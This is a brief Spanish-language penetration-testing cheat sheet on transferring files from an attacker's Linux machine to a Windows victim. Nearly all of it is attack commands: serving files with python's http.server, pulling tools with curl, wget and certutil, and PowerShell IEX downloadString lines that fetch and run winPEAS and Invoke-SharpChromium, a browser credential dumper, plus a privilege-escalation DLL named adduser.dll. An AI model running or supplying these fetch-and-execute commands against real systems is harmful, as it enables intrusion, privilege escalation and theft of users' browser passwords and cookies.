Transferencia de archivos

Máquina atacante Linux

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Máquina víctima Windows

curl http://<ATACKER-IP>:<PORT>/<FILENAME> -o <OUTPUT-FILENAME>

Descargar archivo desde la máquina víctima

powershell "IEX(New-Object Net.WebClient).downloadString('http://<attacking-machine-IP>:8080/winPEAS.ps1')" > winpeas.txt

certutil.exe -urlcache -f http://10.10.14.137:8000/Perfusion.exe Perfusion.exe

python3 -m http.server <PORT>
wget "http://<ATTACKER-IP>:<PORT>/adduser.dll" -outfile "adduser.dll"

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')

Last updated